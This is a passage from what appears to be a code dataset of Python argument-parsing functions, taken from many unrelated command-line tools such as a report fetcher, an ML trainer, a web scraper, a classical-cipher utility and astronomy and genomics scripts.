parse_args(argv):\n\n parser = argparse.ArgumentParser(description='Fetch the requested report from App Nexus and save it to file system.')\n\n parser.add_argument('report_request', help='Path to JSON file that contains the report request.')\n parser.add_argument('-c', '--config', help='Path to JSON file that contains the keys \"api_endpoint\", \"user\" and \"pass\". If this parameter is not given, env vars APPNEXUS_API_ENDPOINT, APPNEXUS_USER and APPNEXUS_PASS must be set.')\n parser.add_argument('-d', '--save_dir', default='', help='The directory to save the report CSV. Default is current directory.')\n parser.add_argument('-I', '--no-interaction', action='store_true', help='Whether to ask confirmation before fetching report.')\n parser.add_argument('-s', '--start', help='Value for \"start_date\" parameter of report request.')\n parser.add_argument('-e', '--end', help='Value for \"end_date\" parameter of report request.')\n parser.add_argument('-i', '--interval', help='Value for \"report_interval\" parameter of report request.')\n parser.add_argument('--debug', action='store_true', help='Whether to print extra debug information or not.')\n\n args = parser.parse_args(argv[1:])\n\n\n if args.config:\n args.config = json.load(open(args.config, 'r'))\n\n elif (\n os.environ.get('APPNEXUS_API_ENDPOINT') and\n os.environ.get('APPNEXUS_USER') and\n os.environ.get('APPNEXUS_PASS')\n ):\n args.config = {\n 'api_endpoint': os.environ['APPNEXUS_API_ENDPOINT'],\n 'user' : os.environ['APPNEXUS_USER'],\n 'pass' : os.environ['APPNEXUS_PASS']\n }\n\n else:\n print \"\"\"\n You must either provide a --config parameter or\n set the env vars APPNEXUS_API_ENDPOINT, APPNEXUS_USER and APPNEXUS_PASS!\n Call this script with the --help option for more information.\n \"\"\"\n\n sys.exit(1)\n\n\n return args", "def _parse_options(self, force_args=None):\r\n argv = sys.argv[1:] if force_args is None else force_args\r\n if argv and argv[0] in self._commands:\r\n self._command = argv.pop(0)\r\n else:\r\n self._command = None\r\n parser = self._construct_full_parser()\r\n self._option_values, self._argv = parser.parse(self._add_default_options(argv))", "def parse_arguments(args):\n\n parser = argparse.ArgumentParser(\n description=\"Text2Text: Read input text training files, output item files and train a model\"\n )\n\n parser.add_argument(\n \"-i\",\n \"--input-text-path\",\n type=str,\n required=True,\n metavar=\"INPUT_TEXT_PATH\",\n help=\"Text input file name. Format: in each line, OUTPUT_ID1,OUTPUT_ID2,OUTPUT_ID3,...\\t INPUT_TEXT \\\n where OUTPUT_IDs are the zero-based output item indices corresponding to the line numbers of OUTPUT_ITEM_PATH. We assume utf-8 encoding for text.\",\n )\n\n parser.add_argument(\n \"-q\",\n \"--output-item-path\",\n type=str,\n required=True,\n metavar=\"OUTPUT_ITEM_PATH\",\n help=\"Output item file name. Format: each line corresponds to a representation of the output item. We assume utf-8 encoding for text.\",\n )\n\n parser.add_argument(\n \"-m\",\n \"--model-folder\",\n type=str,\n required=True,\n metavar=\"MODEL_FOLDER\",\n help=\"Output model folder name\",\n )\n\n parser.add_argument(\n \"--workspace-folder\",\n type=str,\n default=None,\n metavar=\"WORKSPACE_FOLDER\",\n help=\"A folder name for storing intermediate variables during training\",\n )\n\n vectorizer_config_group_parser = parser.add_mutually_exclusive_group()\n vectorizer_config_group_parser.add_argument(\n \"--vectorizer-config-path\",\n type=str,\n default=None,\n metavar=\"VECTORIZER_CONFIG_PATH\",\n help=\"Json file for vectorizer config (default tfidf vectorizer)\",\n )\n\n vectorizer_config_group_parser.add_argument(\n \"--vectorizer-config-json\",\n type=str,\n default='{\"type\":\"tfidf\", \"kwargs\":{}}',\n metavar=\"VECTORIZER_CONFIG_JSON\",\n help='Json-format string for vectorizer config (default {\"type\":\"tfidf\", \"kwargs\":{}})',\n )\n\n parser.add_argument(\n \"--dtype\",\n type=lambda x: np.float32 if \"32\" in x else np.float64,\n default=np.float32,\n help=\"data type for the csr matrix. float32 | float64. (default float32)\",\n )\n\n parser.add_argument(\n \"--max-leaf-size\",\n type=cli.comma_separated_type(int),\n default=[100],\n metavar=\"INT-LIST\",\n help=\"The max size of the leaf nodes of hierarchical 2-means clustering. Multiple values (separated by comma) are supported and will lead to different individual models for ensembling. (default [100])\",\n )\n\n parser.add_argument(\n \"--nr-splits\",\n type=int,\n default=2,\n metavar=\"INT\",\n help=\"number of splits used to construct hierarchy (a power of 2 is recommended, default 2)\",\n )\n\n parser.add_argument(\n \"--imbalanced-ratio\",\n type=float,\n default=0.0,\n metavar=\"FLOAT\",\n help=\"Value between 0.0 and 0.5 (inclusive). Indicates how relaxed the balancedness constraint of 2-means can be. Specifically, if an iteration of 2-means is clustering L labels, the size of the output 2 clusters will be within approx imbalanced_ratio * 2 * L of each other. (default 0.0)\",\n )\n\n parser.add_argument(\n \"--imbalanced-depth\",\n type=int,\n default=100,\n metavar=\"INT\",\n help=\"After hierarchical 2-means clustering has reached this depth, it will continue clustering as if --imbalanced-ratio is set to 0.0. (default 100)\",\n )\n\n parser.add_argument(\n \"--label-embed-type\",\n type=cli.comma_separated_type(str),\n default=\"pifa\",\n metavar=\"STR-LIST\",\n help=\"Label embedding types. (default pifa).\\\n We support pifa, pifa_lf_concat::Z=path, and pifa_lf_convex_combine::Z=path::alpha=scalar_value,\\\n where path is the additional user-porivded label embedding path and alpha is the scalar value for convex combination.\\\n Multiple values (separated by comma) are supported and will lead to different individual models for ensembling.\",\n )\n\n parser.add_argument(\n \"--indexer\",\n choices=Indexer.indexer_dict.keys(),\n default=\"hierarchicalkmeans\",\n metavar=\"STR\",\n help=f\"Indexer algorithm (default hierarchicalkmeans). Available choices are {', '.join(Indexer.indexer_dict.keys())}\",\n )\n\n parser.add_argument(\n \"--no-spherical\",\n action=\"store_true\",\n default=False,\n help=\"Do not l2-normalize cluster centers while clustering\",\n )\n\n parser.add_argument(\n \"--seed\",\n type=cli.comma_separated_type(int),\n default=[0],\n metavar=\"INT-LIST\",\n help=\"Random seeds (default 0). Multiple values (separated by comma) are supported and will lead to different individual models for ensembling.\",\n )\n\n parser.add_argument(\n \"--max-iter\",\n type=int,\n default=20,\n metavar=\"INT\",\n help=\"The max iteration for indexing (default 20)\",\n )\n\n parser.add_argument(\n \"-n\",\n \"--threads\",\n type=int,\n default=-1,\n metavar=\"INT\",\n help=\"Number of threads to use (default -1 to denote all the CPUs)\",\n )\n\n # Linear matching/ranking parameters\n parser.add_argument(\n \"-s\",\n \"--solver-type\",\n type=str,\n default=\"L2R_L2LOSS_SVC_DUAL\",\n metavar=\"STR\",\n help=\"{} (default L2R_L2LOSS_SVC_DUAL)\".format(\" | \".join(XLINEAR_SOLVERS.keys())),\n )\n\n parser.add_argument(\n \"--Cp\",\n type=float,\n default=1.0,\n metavar=\"VAL\",\n help=\"Coefficient for positive class in the loss function (default 1.0)\",\n )\n\n parser.add_argument(\n \"--Cn\",\n type=float,\n default=1.0,\n metavar=\"VAL\",\n help=\"Coefficient for negative class in the loss function (default 1.0)\",\n )\n\n parser.add_argument(\n \"--bias\", type=float, default=1.0, metavar=\"VAL\", help=\"bias term (default 1.0)\"\n )\n\n parser.add_argument(\n \"-ns\",\n \"--negative-sampling\",\n type=str,\n choices=[\"tfn\", \"man\", \"tfn+man\"],\n default=\"tfn\",\n metavar=\"STR\",\n help=\"Negative Sampling Schemes\",\n )\n\n parser.add_argument(\n \"-t\",\n \"--threshold\",\n type=float,\n default=0.1,\n metavar=\"VAL\",\n help=\"Threshold to sparsify the model weights (default 0.1)\",\n )\n\n # Prediction kwargs\n parser.add_argument(\n \"-k\",\n \"--only-topk\",\n type=int,\n default=20,\n metavar=\"INT\",\n help=\"the default number of top labels used in the prediction\",\n )\n\n parser.add_argument(\n \"-b\",\n \"--beam-size\",\n type=int,\n default=10,\n metavar=\"INT\",\n help=\"the default size of beam search used in the prediction\",\n )\n\n parser.add_argument(\n \"-pp\",\n \"--post-processor\",\n type=str,\n choices=PostProcessor.valid_list(),\n default=\"l3-hinge\",\n metavar=\"STR\",\n help=\"the default post processor used in the prediction\",\n )\n\n parser.add_argument(\n \"--verbose-level\",\n type=int,\n choices=logging_util.log_levels.keys(),\n default=1,\n metavar=\"INT\",\n help=f\"the verbose level, {', '.join([str(k) + ' for ' + logging.getLevelName(v) for k, v in logging_util.log_levels.items()])}, default 1\",\n )\n\n parsed_args = parser.parse_args(args)\n return parsed_args", "def parseArgs(args):\n parser = argparse.ArgumentParser(description = \"Scrapes baseball-reference.com for player statistics\")\n\n parser.add_argument(\"-d\", \"--domain\", help=\"domain to scrape for statistics. Default is baseball-reference.com\", nargs=1, default=[\"http://www.baseball-reference.com\"])\n parser.add_argument(\"-f\", \"--filename\", help=\"database file to store data in\", required=True, nargs=1, type=argparse.FileType(\"r+\"))\n parser.add_argument(\"-r\", \"--reset\", help=\"removes database before scraping all data from baseball-reference. Conflicts with -u. One of -r and -u must be specified\", action=\"store_true\")\n parser.add_argument(\"-u\", \"--update\", help=\"scrapes baseball-reference and adds all new information to the database. Conflicts with -r. One of -r and -u must be specified\", action=\"store_true\")\n parser.add_argument(\"--verbose\", help=\"enables verbose output\", action=\"store_true\")\n parser.add_argument(\"--version\", help=\"prints out version and exits\", action=\"version\", version=\"%(prog)s ({version})\".format(version=__version__))\n\n parsedArgs = parser.parse_args()\n\n if parsedArgs.reset == parsedArgs.update:\n parser.error(\"-r and -u are conflicting flags. Exactly one must be specified\")\n parser.print_help()\n\n return parsedArgs", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('n_iter',\n help='number of iteration',\n type=int)\n parser.add_argument('n_processes',\n help='number of processes',\n type=int)\n parser.add_argument('method',\n help='mutual exclusion method')\n parser.add_argument('duration',\n help='Duration of each process',\n type=float)\n return parser.parse_args()", "def parse_command_line_arguments():\n parser = argparse.ArgumentParser()\n\n # Positional args\n parser.add_argument('data_directory', action=\"store\")\n\n # Optional args\n parser.add_argument('--save_dir', action='store',\n dest='save_dir',\n help='Load categories names from given file',\n default=\"checkpoint.pth\")\n\n parser.add_argument('--gpu', action='store_true',\n dest='device',\n help='Device of prediction processing',\n default=False)\n\n parser.add_argument('--arch', action='store',\n dest='arch',\n help='Name of pre-trained network used for training',\n default=\"vgg11\")\n\n parser.add_argument('--learning_rate', action='store',\n dest='learning_rate',\n help='value of training learning rate',\n default=0.001)\n\n parser.add_argument('--hidden_units', action='store',\n dest='hidden_units',\n help='Number of units in the fully-connected hidden '\n 'layer of the neural netwrork',\n default=512)\n\n parser.add_argument('--epochs', action='store',\n dest='epochs',\n help='Number of training epochs',\n default=5)\n\n # Parse all args\n results = parser.parse_args()\n\n return results", "def parse_args(self):\n parser = argparse.ArgumentParser(description='Build PDF documentation')\n parser.add_argument('config', help='YAML config file')\n parser.add_argument('-f', '--fast', help='Do not update toc',\n action='store_true', default=False)\n parser.add_argument('-p', '--pandoc', help='Only pandoc, no latex',\n action='store_true', default=False)\n parser.add_argument('-n', '--nocache', help='Disable cache',\n action='store_true', default=False)\n parser.add_argument('-v', '--verbose', help='Enables verbose output; '\n 'repeat up to three time for more verbose output',\n action='count', default=0)\n\n self.args = parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(prog='AdapterRunner', description='Adapter Runner Application')\n parser.add_argument('-a', '--application', action='store', dest='app_name', help='Application Name',\n metavar='<application_name>')\n parser.add_argument('-fi', '--fetch_interval', action='store', dest='fetch_stats_interval', help='Fetch Stats Interval',\n metavar='<fetch_interval in seconds>')\n return parser.parse_args()", "def handle_args():\n parser = argparse.ArgumentParser(\n description=\"\"\"Script to download archives from the NLM public\n FTP server.\n \"\"\")\n # Server settings\n server_settings = parser.add_argument_group('FTP SERVER SETTINGS', '')\n server_settings.add_argument(\n '-n', '--netrc', default='~/.netrc',\n help=\"\"\"netrc file containing login parameters for the NLM\n server. See `man 5 netrc` for details on generating this\n file or read nlm_data_import/netrc/example.netrc.\n \"\"\")\n server_settings.add_argument(\n 'server_data_dir',\n help='Directory containing desired files on the NLM FTP server')\n server_settings.add_argument(\n '-l', '--limit', type=int, default=0,\n help='Only download LIMIT files.')\n\n # Download settings\n local_settings = parser.add_argument_group('LOCAL SETTINGS', '')\n local_settings.add_argument(\n '-d', '--download_database', default='~/.ftp_download_db',\n help='Path to SQLite database detailing past downloads')\n local_settings.add_argument(\n '-o', '--output_dir', default='~/medline_data',\n help='Directory where downloads will be saved')\n local_settings.add_argument(\n '-x', '--export_dir', default='~/medline_data_exports',\n help=\"\"\"Directory where data to be retrieved by the\n `hypothesis_graph application server are staged.\n \"\"\")\n # Sending debug emails (requires the send_ses_messages module - see\n # setup.py)\n debugging_settings = parser.add_argument_group('DEBUGGING SETTINGS', '')\n debugging_settings.add_argument(\n '--email_debugging', default=False, action='store_true',\n help=\"Send debugging emails. Defaults to FALSE.\")\n debugging_settings.add_argument(\n '--from_email', required=False, help=\"FROM field for debugging emails\")\n debugging_settings.add_argument(\n '--to_email', required=False, help=\"TO field for debugging emails\")\n\n return parser.parse_args()", "def parse_command_line() -> argparse.Namespace:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'pet_database',\n type=str,\n help='path to pet database'\n )\n parser.add_argument(\n '--image_dir',\n default='data/images'\n )\n parser.add_argument(\n '--log',\n default=None,\n help='log file path'\n )\n\n args = parser.parse_args()\n args.pet_database = os.path.abspath(os.path.expanduser(args.pet_database))\n args.image_dir = os.path.abspath(os.path.expanduser(args.image_dir))\n args.log = os.path.abspath(os.path.expanduser(args.log)) if args.log else None\n return args", "def parse_arguments(cls):\r\n parser = argparse.ArgumentParser(description='Easy Infer for model benchmark')\r\n cls.base_arg_parse(parser)\r\n cls.model_arg_parse(parser)\r\n cls.task_arg_parse(parser)\r\n args = parser.parse_args()\r\n return args", "def _parse_arguments():\n parser = argparse.ArgumentParser(\n prog=\"JSON sorter\",\n description=\"Take a json file, sort the keys and insert 4 spaces for indents.\",\n )\n\n parser.add_argument(\n \"input\", help=\"JSON file to parse.\",\n )\n\n parser.add_argument(\n \"-o\",\n \"--output\",\n default=sys.stdout,\n type=argparse.FileType(mode=\"w\"),\n help=\"File to write to. Defaults to stdout.\",\n )\n\n # Should probably implement this and CSV as subcommands\n parser.add_argument(\n \"-y\",\n \"--yaml\",\n action=\"store_true\",\n help=\"Whether to sort a YAML file provided as the input.\",\n )\n\n # is there a way to have info printed with this from argparse?\n parser.add_argument(\n \"-l\",\n \"--log\",\n action=\"store_true\",\n help=\"Turn logging on and print to console.\",\n )\n\n parser.add_argument(\n \"-ll\",\n \"--log_level\",\n dest=\"log_level\",\n choices=[\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"CRITICAL\"],\n help=\"Set the logging level\",\n )\n\n parser.add_argument(\n \"-V\", \"--version\", action=\"version\", version=\"%(prog)s\" + __version__\n )\n\n if len(sys.argv[1:]) == 0:\n parser.print_help()\n sys.exit()\n\n args = parser.parse_args()\n return args", "def parse_arguments(args: list = None) -> Dict[str, str]:\n arg_parser = argparse.ArgumentParser(description=\"Console command to crypt \"\n \"and decrypt texts using \"\n \"classic methods. It also \"\n \"performs crypto attacks \"\n \"against those methods.\\n\",\n epilog=\"Follow cifra development at: \"\n \"<https://github.com/dante-signal31/cifra>\")\n cifra_subparsers = arg_parser.add_subparsers(help=\"Available modes\",\n dest=\"mode\",\n required=True)\n # DICTIONARY MANAGEMENT.\n dictionary_parser = cifra_subparsers.add_parser(name=\"dictionary\",\n help=\"Manage dictionaries to \"\n \"perform crypto attacks.\")\n dictionary_actions_subparser = dictionary_parser.add_subparsers(help=\"Action to perform.\",\n dest=\"action\")\n # DICTIONARY CREATION.\n dictionary_create_parser = dictionary_actions_subparser.add_parser(name=\"create\",\n help=\"Create a dictionary of unique words.\")\n dictionary_create_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to create.\",\n metavar=\"NEW_DICTIONARY_NAME\")\n dictionary_create_parser.add_argument(\"-i\", \"--initial_words_file\",\n type=_check_is_file,\n help=\"Optionally you can load in the dictionary words located in a text file\",\n metavar=\"PATH_TO FILE_WITH_WORDS\")\n # DICTIONARY REMOVAL.\n dictionary_delete_parser = dictionary_actions_subparser.add_parser(name=\"delete\",\n help=\"Remove an existing dictionary.\")\n dictionary_delete_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to delete.\",\n metavar=\"DICTIONARY_NAME_TO_DELETE\")\n # DICTIONARY UPDATING.\n dictionary_update_parser = dictionary_actions_subparser.add_parser(name=\"update\",\n help=\"Add words to an existing dictionary.\")\n dictionary_update_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to update with additional words.\",\n metavar=\"DICTIONARY_NAME_TO_UPDATE\")\n dictionary_update_parser.add_argument(\"words_file\",\n type=_check_is_file,\n help=\"Pathname to a file with words to add to dictionary\",\n metavar=\"PATH_TO_FILE_WITH_WORDS\")\n # DICTIONARY LISTING.\n _ = dictionary_actions_subparser.add_parser(name=\"list\",\n help=\"Show existing dictionaries.\")\n # CIPHER MANAGEMENT.\n cipher_parser = cifra_subparsers.add_parser(name=\"cipher\",\n help=\"Cipher a text using a key.\")\n cipher_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to use to cipher.\",\n metavar=\"ALGORITHM_NAME\")\n cipher_parser.add_argument(\"key\",\n type=str,\n help=\"Key to use to cipher.\",\n metavar=\"CIPHERING_KEY\")\n cipher_parser.add_argument(\"file_to_cipher\",\n type=_check_is_file,\n help=\"Path to file with text to cipher.\",\n metavar=\"FILE_TO_CIPHER\")\n cipher_parser.add_argument(\"-o\", \"--ciphered_file\",\n type=str,\n help=\"Path to output file to place ciphered text. If not used then\"\n \"ciphered text will be dumped to console.\",\n metavar=\"OUTPUT_CIPHERED_FILE\")\n cipher_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n # DECIPHERING MANAGEMENT\n decipher_parser = cifra_subparsers.add_parser(name=\"decipher\",\n help=\"Decipher a text using a key.\")\n decipher_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to use to decipher.\",\n metavar=\"ALGORITHM_NAME\")\n decipher_parser.add_argument(\"key\",\n type=str,\n help=\"Key to use to decipher.\",\n metavar=\"CIPHERING_KEY\")\n decipher_parser.add_argument(\"file_to_decipher\",\n type=_check_is_file,\n help=\"Path to file with text to decipher.\",\n metavar=\"FILE_TO_DECIPHER\")\n decipher_parser.add_argument(\"-o\", \"--deciphered_file\",\n type=str,\n help=\"Path to output file to place deciphered text. If not used then\"\n \"deciphered text will be dumped to console.\",\n metavar=\"OUTPUT_DECIPHERED_FILE\")\n decipher_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n # ATTACK MANAGEMENT\n attack_parser = cifra_subparsers.add_parser(name=\"attack\",\n help=\"Attack a ciphered text to get its plain text\")\n attack_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to attack.\",\n metavar=\"ALGORITHM_NAME\")\n attack_parser.add_argument(\"file_to_attack\",\n type=_check_is_file,\n help=\"Path to file with text to attack.\",\n metavar=\"FILE_TO_ATTACK\")\n attack_parser.add_argument(\"-o\", \"--deciphered_file\",\n type=str,\n help=\"Path to output file to place deciphered text. If not used then\"\n \"deciphered text will be dumped to console.\",\n metavar=\"OUTPUT_DECIPHERED_FILE\")\n attack_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n\n parsed_arguments = vars(arg_parser.parse_args(args))\n filtered_parser_arguments = {key: value for key, value in parsed_arguments.items()\n if value is not None}\n return filtered_parser_arguments", "def parse_arguments():\n # shift away script name\n scriptname=sys.argv[0]\n shift()\n ncl_cmd=list()\n quali_cmd=list()\n id_cmd=list() \n while(len(sys.argv)>0):\n carg = sys.argv[0]\n shift()\n if(carg == \"--nucleotide\"):\n ncl_cmd = mungeArgs(sys.argv)\n elif(carg == \"--quality\"):\n quali_cmd = mungeArgs(sys.argv)\n elif(carg == \"--id\" ):\n id_cmd = mungeArgs(sys.argv)\n elif(carg in [\"-h\", \"--help\"]):\n usage()\n else:\n usage(error=True)\n # Excess arguments which are not processed \n if(len(sys.argv) > 0):\n sys.stdout.write(\"Excess arguments!\\n\")\n sys.stdout.flush()\n usage(error=True)\n\n # external modules rely on non-empty argv array, \n # re-append the script name as first command line argument\n sys.argv.append(scriptname)\n return (id_cmd, ncl_cmd, quali_cmd)", "def parse_args():\n parser = argparse.ArgumentParser(description=\"Run NCF..\")\n parser.add_argument(\n \"--config_file\",\n nargs=\"?\",\n type=str,\n default=\"../configs/ncf_default.json\",\n help=\"Specify the config file name. Only accept a file from ../configs/\",\n )\n # If the following settings are specified with command line,\n # These settings will used to update the parameters received from the config file.\n parser.add_argument(\n \"--dataset\",\n nargs=\"?\",\n type=str,\n help=\"Options are: tafeng, dunnhunmby and instacart\",\n )\n parser.add_argument(\n \"--data_split\",\n nargs=\"?\",\n type=str,\n help=\"Options are: leave_one_out and temporal\",\n )\n parser.add_argument(\n \"--root_dir\", nargs=\"?\", type=str, help=\"working directory\",\n )\n parser.add_argument(\n \"--emb_dim\", nargs=\"?\", type=int, help=\"Dimension of the embedding.\"\n )\n parser.add_argument(\"--lr\", nargs=\"?\", type=float, help=\"Intial learning rate.\")\n parser.add_argument(\"--max_epoch\", nargs=\"?\", type=int, help=\"Number of max epoch.\")\n parser.add_argument(\n \"--batch_size\", nargs=\"?\", type=int, help=\"Batch size for training.\"\n )\n parser.add_argument(\"--optimizer\", nargs=\"?\", type=str, help=\"OPTI\")\n parser.add_argument(\"--activator\", nargs=\"?\", type=str, help=\"activator\")\n parser.add_argument(\"--alpha\", nargs=\"?\", type=float, help=\"ALPHA\")\n return parser.parse_args()", "def parse_args():\n parser = ArgumentParser(\n description=\"This is a script for auto apply ipex optimization.\"\n \"\\n################################# Basic usage ############################# \\n\"\n \"\\n 1. Apply ipex optimization with fp32 data type\\n\"\n \"\\n >>> python -m intel_extension_for_pytorch.cpu.auto_ipex python_script args \\n\"\n \"\\n 2. Apply ipex optimization with bf16 data type\\n\"\n \"\\n >>> python -m intel_extension_for_pytorch.cpu.auto_ipex --dtype bfloat16 python_script args \\n\",\n formatter_class=RawTextHelpFormatter,\n )\n\n add_auto_ipex_params(parser, auto_ipex_default_enabled=True)\n\n # positional\n parser.add_argument(\n \"program\",\n type=str,\n help=\"The full path to the proram/script to be launched. \"\n \"followed by all the arguments for the script\",\n )\n # rest from the training program\n parser.add_argument(\"program_args\", nargs=REMAINDER)\n return parser.parse_args()", "def parse(self, args):\n pass", "def _parse_args():\n parser = argparse.ArgumentParser(description=\"\")\n #parser.add_argument(\"args\", metavar=\"N\", type=str, nargs=\"*\", help=\"Positional arguments.\")\n #parser.add_argument(\"\", dest=\"\", type=\"\", default=, help=)\n #parser.add_argument(\"--version\", action=\"version\", version=\"<the version>\")\n\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(\n description=\"script for downloading and merging log files from S3 for particular time period\")\n parser.add_argument(\"-s\", \n \"--startdate\", \n help=\"start date in format YYYYMMDD\", \n required=True, \n type=valid_date)\n parser.add_argument(\"-e\", \"--enddate\", \n help=\"end date in format YYYYMMDD\", \n required=True, \n type=valid_date)\n parser.add_argument(\"-f\", \n \"--file\", \n help=\"destination file\", \n required=True)\n parser.add_argument( \"-c\", \"--config\",\n default=\"/Users/samarius/.get_analytics_log.config.json\",\n help=\"configuration file path\")\n\n\n try:\n args = parser.parse_args()\n return args\n except Exception as e:\n print \"can't parse command line args: {}\".format(repr(e))\n raise", "def parseCommandLine():\n\n parser = argparse.ArgumentParser(\n description='Determine photometric zeropoint of banzai-reduced LCO imaging data.')\n\n\n parser.add_argument('--log-level', dest='log_level', default='INFO', choices=['DEBUG', 'INFO'],\n help='Set the log level')\n parser.add_argument('--ps1dir', dest='ps1dir', default='~/Catalogs/ps1odi/panstarrs/',\n help='Directory of PS1 catalog')\n parser.add_argument(\"--diagnosticplotsdir\", dest='outputimageRootDir', default=None,\n help='Output directory for diagnostic photometry plots. No plots generated if option is omitted. This is a time consuming task. ')\n parser.add_argument('--photodb', dest='imagedbPrefix', default='~/lcozpplots/lcophotzp.db',\n help='Result output directory. .db file is written here')\n parser.add_argument('--imagerootdir', dest='rootdir', default='/archive/engineering',\n help=\"LCO archive root directory\")\n parser.add_argument('--site', dest='site', default=None, help='sites code for camera')\n parser.add_argument('--mintexp', dest='mintexp', default=60, type=float, help='Minimum exposure time to accept')\n parser.add_argument('--redo', action='store_true')\n parser.add_argument ('--preview', dest='processstatus', default='processed', action='store_const', const='preview')\n\n\n\n mutex = parser.add_mutually_exclusive_group()\n mutex.add_argument('--date', dest='date', default=[None,], nargs='+', help='Specific date to process.')\n mutex.add_argument('--lastNdays', type=int)\n\n\n cameragroup = parser.add_mutually_exclusive_group()\n\n cameragroup.add_argument('--camera', dest='camera', default=None, help='specific camera to process. ')\n cameragroup.add_argument('--cameratype', dest='cameratype', default=None, choices=['fs', 'fl', 'kb'],\n help='camera type to process at selected sites to process. ')\n cameragroup.add_argument('--crawldirectory', default=None, type=str,\n help=\"process all reduced image in specific directoy\")\n\n args = parser.parse_args()\n\n logging.basicConfig(level=getattr(logging, args.log_level.upper()),\n format='%(asctime)s.%(msecs).03d %(levelname)7s: %(module)20s: %(message)s')\n\n args.imagedbPrefix = os.path.expanduser(args.imagedbPrefix)\n\n if args.outputimageRootDir is not None:\n args.outputimageRootDir = os.path.expanduser(args.outputimageRootDir)\n print (\"Writing db to directory: %s\" % args.outputimageRootDir)\n\n if args.crawldirectory is not None:\n args.crawldirectory = os.path.expanduser(args.crawldirectory)\n\n\n\n if (args.lastNdays is not None):\n args.date=[]\n today = datetime.datetime.utcnow()\n for ii in range (args.lastNdays):\n day = today - datetime.timedelta(days=ii)\n args.date.append (day.strftime(\"%Y%m%d\"))\n\n args.date = args.date[::-1]\n\n args.ps1dir = os.path.expanduser(args.ps1dir)\n\n print (args.processstatus)\n return args", "def parse_arguments():\n\n parser = argparse.ArgumentParser(\n description=\"生成用户字符串识别的切分字符串\"\n )\n parser.add_argument(\n \"-o\",\n \"--output_dir\",\n type=str,\n nargs=\"?\",\n help=\"The output directory\",\n default=\"output/\"\n )\n parser.add_argument(\n \"-i\",\n \"--input_file\",\n type=str,\n nargs=\"?\",\n help=\"When set, this argument uses a specified text file as source for the text\",\n default=\"\",\n required=True\n )\n parser.add_argument(\n \"-mi\",\n \"--min_char_count\",\n type=int,\n nargs=\"?\",\n help=\"The minimum number of characters per line, Default is 3.\",\n default=3,\n\n )\n parser.add_argument(\n \"-ma\",\n \"--max_char_count\",\n type=int,\n nargs=\"?\",\n help=\"The maximum number of characters per line, Default is 20.\",\n default=20,\n )\n return parser.parse_args()", "def parse_args():\n parser = common_parser()\n parser.description = (\n \"Given a sequence dict, fasta index or a bed file, scatter over the \"\n \"defined contigs/regions. Each contig/region will be split into \"\n \"multiple overlapping regions, which will be written to a new bed \"\n \"file. Each contig will be placed in a new file, unless the length of \"\n \"the contigs/regions doesn't exceed a given number.\")\n\n parser.add_argument(\"-c\", \"--chunk-size\", type=int, default=1e6,\n metavar=\"SIZE\",\n help=\"The size of the chunks. The first chunk in a \"\n \"region or contig will be exactly length SIZE, \"\n \"subsequent chunks will SIZE + OVERLAP and the final \"\n \"chunk may be anywhere from 0.5 to 1.5 times SIZE \"\n \"plus overlap. If a region (or contig) is smaller \"\n \"than SIZE the original regions will be returned. \"\n \"Defaults to 1e6\")\n parser.add_argument(\"-m\", \"--minimum-bp-per-file\", type=int, default=45e6,\n help=\"The minimum number of bases represented within \"\n \"a single output bed file. If an input contig or \"\n \"region is smaller than this MINIMUM_BP_PER_FILE, \"\n \"then the next contigs/regions will be placed in the \"\n \"same file untill this minimum is met. Defaults to \"\n \"45e6.\")\n parser.add_argument(\"-o\", \"--overlap\", type=int, default=150,\n help=\"The number of bases which each chunk should \"\n \"overlap with the preceding one. Defaults to 150.\")\n parser.add_argument(\"-S\", \"--split-contigs\", action=\"store_true\",\n help=\"If set, contigs are allowed to be split up over \"\n \"multiple files.\")\n args = parser.parse_args()\n return args", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-e\", \"--events\", type=str,\n help=\"path to events CSV-file\")\n parser.add_argument(\"-d\", \"--data\", type=str,\n help=\"path to data CSV-file\")\n parser.add_argument(\"-l\", \"--limit\", nargs='?', type=int, default=None,\n help=\"max records to be processed\")\n parser.add_argument(\"-t\", \"--timezone\", nargs='?', type=int, default=5,\n help=\"date and time shift\")\n parser.add_argument(\"-o\", \"--optimized\", action='store_true',\n help=\"if specified, then data CSV will be processed\"\n \" by small chunks to escape memory issues\")\n parser.add_argument(\"-v\", \"--verbose\", action='store_true')\n parser.add_argument(\"--output-folder\", nargs='?', type=str,\n default=\"linked\")\n return vars(parser.parse_args())", "def parse_args():\n parser = default_argument_parser()\n parser.add_argument(\"--label-map\",\n dest=\"label_map\",\n type=pathlib.Path,\n help=\"Label map in YAML format which maps from category \"\n \"ID to name.\")\n parser.add_argument(\"--train-csv\",\n dest=\"train_csv\",\n required=True,\n type=pathlib.Path,\n help=\"Path to training data CSV file.\")\n parser.add_argument(\"--valid-csv\",\n dest=\"valid_csv\",\n required=False,\n type=pathlib.Path,\n help=\"Optional path to validation data CSV file.\")\n parser.add_argument(\n \"--image-width\",\n type=int,\n help=\"Image width (optional, used to speed up dataset processing).\")\n parser.add_argument(\n \"--image-height\",\n type=int,\n help=\"Image height (optional, used to speed up dataset processing).\")\n return parser.parse_args()", "def parse_args():\n from argparse import ArgumentParser\n ap = 